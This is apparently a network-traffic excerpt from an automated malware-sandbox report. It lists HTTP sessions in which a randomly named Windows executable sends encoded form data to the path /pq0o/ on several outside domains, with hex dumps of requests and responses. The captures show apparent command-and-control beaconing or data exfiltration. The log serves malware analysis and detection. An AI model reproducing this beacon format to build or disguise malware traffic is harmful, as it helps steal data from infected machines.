45 52 30 58 35 78 68 30 51 4f 61 4e 4c 50 78 37 62 53 52 72 53 37 30 4f 4b 55 59 6f 75 52 5a 38 6e 44 50 4a 67 66 74 62 6c 61 66 58 74 49 79 4b 30 42 61 62 36 72 73 67 7a 4b 36 2f 67 4e 49 37 56 67 6d 30 7a 6d 49 66 65 47 45 6e 38 45 34 49 62 7a 6d 37 4e 32 4f 37 78 59 74 35 74 54 6a 73 45 52 39 67 48 43 65 31 75 75 48 34 31 34 37 37 75 34 63 42 52 54 48 44 38 4c 52 65 64 75 43 38 5a 52 56 32 44 49 57 6c 74 58 57 36 76 45 52 65 4e 58 32 5a 56 48 4e 62 76 39 5a 30 4d 34 4f 7a 71 67 78 64 56 4c 37 64 38 35 77 31 69 39 7a 35 56 51 48 66 48 71 47 65 36 4a 79 4e 64 4a 71 4c 56 62 57 67 41 42 6b 61 4e 54 67 76 41 47 78 6b 34 54 5a 6e 59 75 67 6e 42 4f 63 75 62 4a 4b 52 63 69 76 42 43 71 6c 41 41 6d 32 6a 37 67 4a 48 31 31 50 77 39 33 2f 46 75 5a 66 4e 38 34 31 35 63 4d 69 54 2f 6c 73 49 64 6b 61 4f 4c 69 44 6a 34 7a 76 75 6e 2b 42 46 6b 44 78 33 53 34 6d 2f 4a 30 72 67 32 68 42 4b 6c 63 6e 56 44 5a 57 4e 71 47 43 70 72 68 65 33 4a 7a 76 62 6f 57 65 68 76 6d 36 79 37 70 44 44 65 31 42 74 77 2b 74 6c 45 56 6e 41 48 62 76 78 47 64 78 35 67 73 77 42 59 6b 48 70 4b 38 39 44 78 49 44 6b 2f 7a 2f 70 2f 76 55 71 4c 61 32 38 72 44 4b 41 59 71 4d 30 5a 76 58 59 39 59 68 71 37 32 62 65 59 46 2b 76 30 76 36 61 34 57 4a 30 2f 48 36 66 49 39 65 52 7a 76 55 78 56 77 37 45 76 75 44 55 58 54 6c 70 65 4a 4e 6f 4e 4b 2b 54 54 43 45 4e 77 49 2b 46 2f 72 50 35 68 71 7a 46 4e 37 45 6f 39 77 2b 49 59 6b 53 43 47 34 38 54 61 72 62 71 5a 62 72 77 32 44 54 37 6a 39 47 76 2b 79 6a 36 47 53 4b 6a 78 39 30 66 2b 72 64 72 32 31 4b 56 67 58 7a 4d 70 33 63 4e 42 32 35 58 44 51 37 53 70 4e 70 47 55 4d 56 4d 4c 49 35 67 74 65 6c 6a 61 63 38 58 35 6a 70 59 38 73 4d 39 6c 57 48 4d 44 39 6d 55 57 75 53 2b 75 4e 49 31 53 2b 6c 77 64 4f 4c 6e 44 39 57 67 74 57 59 74 75 6c 51 4f 6f 43 54 78 51 34 6e 79 68 55 76 79 41 4e 68 43 33 43 70 49 6a 75 36 53 65 45 54 36 73 38 62 67 6e 52 33 69 75 6a 30 44 63 70 6e 6e 35 36 46 53 74 76 4a 65 64 30 36 47 53 4e 7a 31 76 4f 49 6b 66 70 70 34 4b 42 64 69 32 61 44 36 70 6d 43 69 77 32 6b 58 Data Ascii: F49hs=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
Apr 24, 2024 09:23:29.448832989 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 24 Apr 2024 07:23:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: W/"afe-6014d9a904f4f" Content-Encoding: gzip Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D\|v$g\|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HEske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>\|Y\|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D\|Wz7t!9),KQ8xa%9s{Qo/\|mu1.C-r[,j
Apr 24, 2024 09:23:29.448873997 CEST	300	IN	Data Raw: b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64 ea c5 69 Data Ascii: -%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49779	162.43.104.164	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:31.968274117 CEST	363	OUT	GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=b2qFmWlReUJu6citZAtbwrrOSkIcZF9V2+9XddDidwLqjCK16JlrjYTgkvrAjFAj/kbk/ZD/H0dWxyKKd1m8GF0arunEMZ5tvTjrHaUhlNNo1MItznWZgp0= HTTP/1.1 Host: www.shun-yamagata.com Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 24, 2024 09:23:32.234499931 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 24 Apr 2024 07:23:31 GMT Content-Type: text/html Content-Length: 2814 Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: "afe-6014d9a904f4f" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 37 70 78 3b 0a 7d 0a 70 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 65 78 Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px; margin: 0; padding: 0; color: white;}.ex
Apr 24, 2024 09:23:32.234541893 CEST	1289	IN	Data Raw: 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 6c 69 6e Data Ascii: plain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li { color: #666;}h3 { letter-spacing: 1px; font
Apr 24, 2024 09:23:32.234579086 CEST	476	IN	Data Raw: a5 b8 a4 cf b8 ab a4 c4 a4 ab a4 ea a4 de a4 bb a4 f3 a4 c7 a4 b7 a4 bf a1 a3 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 78 70 6c 61 69 6e 22 3e a4 b3 a4 ce a5 a8 a5 e9 a1 bc a4 cf a1 a2 bb d8 c4 ea a4 b7 a4 bf a5 da a1 bc a5 Data Ascii: </h2> <p class="explain"></p> <h3></h3> <div id="white_box"> <div id="cause"> <ul>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49780	84.32.84.32	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:37.878128052 CEST	626	OUT	POST /pq0o/ HTTP/1.1 Host: www.carsinmultan.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.carsinmultan.com Content-Length: 202 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.carsinmultan.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 4a 54 4a 42 32 67 58 52 76 30 37 43 70 45 53 43 43 32 59 38 69 39 51 4a 4f 38 66 4c 41 43 65 63 6c 46 42 49 44 59 48 51 33 33 50 4a 5a 46 6f 65 75 31 76 47 39 47 45 42 37 57 43 73 31 41 76 47 37 63 45 53 78 76 46 62 4e 67 33 61 73 6a 41 38 37 47 53 50 56 48 74 6f 68 44 51 7a 4d 79 69 6e 2b 39 59 2f 33 59 6d 45 69 74 76 63 61 78 6c 2b 41 45 48 72 53 64 53 69 6b 62 59 42 33 53 78 73 74 64 59 41 69 54 59 33 50 50 6e 30 49 31 55 73 33 68 41 42 4c 31 6d 74 77 4d 57 44 34 47 4b 6e 5a 30 78 6c 48 78 74 4b 4b 78 79 34 73 75 66 44 49 76 77 5a 43 4c 59 46 64 61 73 35 69 33 59 4f 71 77 3d 3d Data Ascii: F49hs=JTJB2gXRv07CpESCC2Y8i9QJO8fLACeclFBIDYHQ33PJZFoeu1vG9GEB7WCs1AvG7cESxvFbNg3asjA87GSPVHtohDQzMyin+9Y/3YmEitvcaxl+AEHrSdSikbYB3SxstdYAiTY3PPn0I1Us3hABL1mtwMWD4GKnZ0xlHxtKKxy4sufDIvwZCLYFdas5i3YOqw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49781	84.32.84.32	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:40.568283081 CEST	646	OUT	POST /pq0o/ HTTP/1.1 Host: www.carsinmultan.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.carsinmultan.com Content-Length: 222 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.carsinmultan.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 4a 54 4a 42 32 67 58 52 76 30 37 43 37 30 69 43 46 56 77 38 71 39 51 47 54 4d 66 4c 4a 69 65 59 6c 46 4e 49 44 5a 79 58 33 46 62 4a 5a 6e 41 65 76 30 76 47 36 47 45 42 30 32 44 6b 37 67 76 4e 37 63 35 6c 78 72 4e 62 4e 67 4c 61 73 6e 45 38 36 31 4b 4d 61 33 74 71 70 6a 51 78 54 69 69 6e 2b 39 59 2f 33 5a 43 71 69 74 33 63 61 42 56 2b 44 6c 48 6b 4f 74 53 6c 6a 62 59 42 67 69 78 67 74 64 5a 6a 69 58 41 4a 50 4e 66 30 49 30 45 73 30 7a 35 58 43 31 6d 72 2f 73 58 39 2f 56 54 38 63 48 67 45 47 6a 42 36 4d 46 36 65 74 6f 4f 5a 5a 65 52 4f 51 4c 38 32 41 64 6c 4e 76 30 6c 48 78 33 42 43 57 51 49 43 59 44 4c 75 59 4b 66 62 61 31 70 5a 6c 54 59 3d Data Ascii: 